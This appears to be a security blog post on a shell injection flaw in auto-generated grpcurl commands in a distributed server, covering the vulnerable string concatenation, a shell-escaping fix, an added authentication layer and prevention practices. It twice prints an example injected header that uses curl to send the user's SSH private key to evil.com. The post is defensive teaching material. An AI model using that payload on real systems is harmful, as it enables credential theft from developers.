Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation
Introduction
When developers build tools that generate shell commands for users to copy and run, they often treat those commands as inert strings — just text on a screen. But the moment user-controlled data enters that string without proper sanitization, you've handed an attacker a loaded weapon. This is exactly what happened in the gRPCurl command generation logic in src/distributed_server.cpp.
This vulnerability belongs to a class of bugs known as shell injection (or command injection), one of the most dangerous and persistent vulnerability families in software security. It's listed in the OWASP Top 10 under A03:2021 – Injection and is tracked under CWE-78: Improper Neutralization of Special Elements used in an OS Command.
If you're building distributed systems, developer tooling, or any code that constructs shell commands from dynamic data, this post is for you.
The Vulnerability Explained
What Went Wrong
The distributed server included a feature that auto-generated grpcurl commands — a convenient utility that lets developers inspect and interact with gRPC services from the command line. The idea is helpful: take the connection details (endpoint, headers, request data) and produce a ready-to-paste grpcurl invocation.
The problem? The code used unsafe string concatenation to build that command:
// ❌ VULNERABLE: Direct interpolation of user-controlled values
std::string command = "grpcurl -H '" + header_value + "' "
+ "-d '" + request_data + "' "
+ endpoint + " "
+ service_method;
Here, header_value, request_data, endpoint, and service_method all come from API responses — data that an attacker can potentially control. None of these values are escaped before being inserted into the shell command string.
How Shell Injection Works
Shell interpreters like bash and sh treat certain characters as special: single quotes ('), double quotes ("), backticks (`), dollar signs ($), semicolons (;), ampersands (&), pipes (|), and more. When these characters appear in a string that gets evaluated by a shell, they can break out of their intended context and introduce new commands.
Consider a malicious header_value like:
Authorization: Bearer token'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '
When naively interpolated, the resulting command becomes:
grpcurl -H 'Authorization: Bearer token'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '' -d '...' example.com:443 mypackage.MyService/MyMethod
What was supposed to be a single grpcurl invocation is now three separate shell commands:
1. A truncated (but executed) grpcurl call
2. A curl command that exfiltrates the user's SSH private key to an attacker-controlled server
3. A harmless echo to clean up the syntax
Real-World Attack Scenario
Here's how an end-to-end attack might look in practice:
- The attacker controls a gRPC server (or man-in-the-middle position) that the distributed server connects to.
- The malicious server returns crafted response headers or data containing shell metacharacters.
- The distributed server generates a gRPCurl command from this response and presents it to the developer.
- The developer, trusting the generated command, copies and pastes it into their terminal.
- The shell executes the injected commands with the developer's full privileges — accessing files, establishing reverse shells, exfiltrating credentials, or worse.
This is particularly insidious because the victim (the developer running the command) has no obvious reason to distrust a command their own tool generated. The attack is invisible in the displayed output if the injected payload is crafted carefully.
Why This Is Rated High Severity
- Arbitrary code execution on the developer's machine
- No authentication bypass required — the attacker only needs to influence data that flows through the system
- Targets developers and operators, who typically have elevated privileges and access to sensitive credentials, infrastructure keys, and internal systems
- Difficult to detect — the malicious payload may be buried in a long header value or encoded in base64 and decoded at execution time
The Fix
What Changed
The fix was applied across three files:
- include/tcp_communication.h
- src/tcp_communication.cpp
- src/distributed_server.cpp
The core change introduces proper shell escaping for all user-controlled values before they are embedded in the generated command string. Additionally, the fix addresses a related issue: the TCP communication layer lacked authentication, meaning any client with network access could connect and send commands as a trusted node. Both issues were resolved together.
Shell Escaping: The Right Approach
The safest way to include arbitrary user data in a shell command string is to single-quote the value and escape any single quotes within it. In shell, a single-quoted string is taken literally — no variable expansion, no command substitution, no special characters. The only character that can break out of single quotes is a single quote itself.
The escaping rule is:
1. Replace every ' in the value with '\'' (close the quote, insert a literal ', reopen the quote)
2. Wrap the entire value in single quotes
// ✅ Safe shell escaping function
std::string shell_escape(const std::string& input) {
std::string escaped = "'";
for (char c : input) {
if (c == '\'') {
escaped += "'\\''"; // End quote, escaped single quote, start quote
} else {
escaped += c;
}
}
escaped += "'";
return escaped;
}
Applied to the command generation:
// ✅ SAFE: All user-controlled values are escaped
std::string command = "grpcurl -H " + shell_escape(header_value) + " "
+ "-d " + shell_escape(request_data) + " "
+ shell_escape(endpoint) + " "
+ shell_escape(service_method);
Now, if an attacker provides the same malicious header_value as before:
Authorization: Bearer token'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '
The escaped output becomes:
grpcurl -H 'Authorization: Bearer token'"'"'; curl https://evil.com/exfil?data=$(cat ~/.ssh/id_rsa); echo '"'"'' ...
The shell sees this as a single string argument to -H. The semicolons, dollar signs, and backticks are all treated as literal characters. The injection is completely neutralized.
Addressing the Authentication Gap
The PR also fixed the underlying TCP communication layer, which accepted connections without any authentication. This is a defense-in-depth improvement: even if a future bug slips through, an unauthenticated attacker on the network can no longer reach the vulnerable code path in the first place.
Proper authentication for distributed node communication should include at minimum:
- Mutual TLS (mTLS) for transport-layer identity verification
- Token or shared-secret handshake at the application layer
- Per-connection session validation before processing any commands
Prevention & Best Practices
1. Never Interpolate Untrusted Data into Shell Commands
The golden rule: treat all external data as untrusted, even if it comes from your own infrastructure. API responses, database values, environment variables, file contents — any of these can be attacker-influenced under the right conditions.
2. Prefer APIs Over Shell Commands
When possible, avoid constructing shell commands altogether. Use native libraries or SDKs that interact with the underlying service directly:
// Instead of building a grpcurl shell command, use a gRPC C++ client library
// to make the call programmatically — no shell involved, no injection risk
grpc::ClientContext context;
context.AddMetadata("authorization", header_value); // Safe: no shell involved
auto stub = MyService::NewStub(channel);
stub->MyMethod(&context, request, &response);
3. Use Allowlists for Structured Inputs
For values like endpoints and service method names that have a known, restricted format, validate them against an allowlist or regex before use:
// Validate endpoint format before use
std::regex endpoint_pattern(R"(^[a-zA-Z0-9\.\-]+:\d{1,5}$)");
if (!std::regex_match(endpoint, endpoint_pattern)) {
throw std::invalid_argument("Invalid endpoint format");
}
4. Use execve Instead of system() or popen()
If you absolutely must invoke a subprocess, use execve() (or execvp()) with an argument array instead of passing a single shell command string to system() or popen(). This bypasses the shell entirely:
// ✅ No shell involved — arguments are passed directly to the program
const char* args[] = {
"grpcurl",
"-H", header_value.c_str(),
"-d", request_data.c_str(),
endpoint.c_str(),
service_method.c_str(),
nullptr
};
execvp(args[0], const_cast<char* const*>(args));
Because there's no shell to interpret metacharacters, injection is structurally impossible.
5. Apply Defense in Depth
- Authenticate all network connections before processing any commands (as this PR also fixed)
- Run services with least privilege — a compromised process should have minimal access
- Log and monitor generated commands for anomalous patterns
- Code review all command-generation logic with an adversarial mindset
6. Use Static Analysis Tools
Several tools can catch this class of vulnerability automatically:
| Tool | Language | Notes |
|---|---|---|
| Semgrep | C/C++, many others | Rules for command injection patterns |
| CodeQL | C/C++, Java, Python, etc. | Taint tracking from source to sink |
| Flawfinder | C/C++ | Lightweight, fast, good for CI |
| Coverity | C/C++ | Enterprise-grade static analysis |
Integrate these into your CI/CD pipeline so injection vulnerabilities are caught before they reach production.
7. Security Standards & References
- OWASP Top 10 A03:2021 – Injection: https://owasp.org/www-project-top-ten/
- CWE-78 – Improper Neutralization of Special Elements used in an OS Command: https://cwe.mitre.org/data/definitions/78.html
- CWE-88 – Improper Neutralization of Argument Delimiters in a Command: https://cwe.mitre.org/data/definitions/88.html
- NIST SP 800-53 – SI-10: Information Input Validation
Conclusion
This vulnerability is a textbook example of why no external data should ever be trusted implicitly — especially when it's being woven into a shell command. The convenience of auto-generating grpcurl commands for developers came with a hidden cost: every user-controlled value in that command was a potential injection point.
The fix is conceptually simple — escape your inputs — but the lesson is broader:
If you're building a string that a shell will eventually interpret, treat every dynamic piece of that string as a potential attack vector.
Key takeaways for your own code:
- ✅ Escape all user-controlled data before shell interpolation
- ✅ Prefer native APIs and library calls over shell commands
- ✅ Use
execve-style APIs to bypass the shell entirely when subprocess execution is necessary - ✅ Authenticate all network connections before processing commands
- ✅ Add static analysis to your CI pipeline to catch injection patterns early
- ✅ Apply defense in depth — no single fix should be your only line of defense
Security is a habit, not a feature. Review your command-generation code today — you might be surprised what you find.
This vulnerability was identified and fixed as part of an automated security scanning and remediation pipeline. Automated tools are a force multiplier for security, but they work best when developers understand the underlying vulnerability classes. Stay curious, stay secure.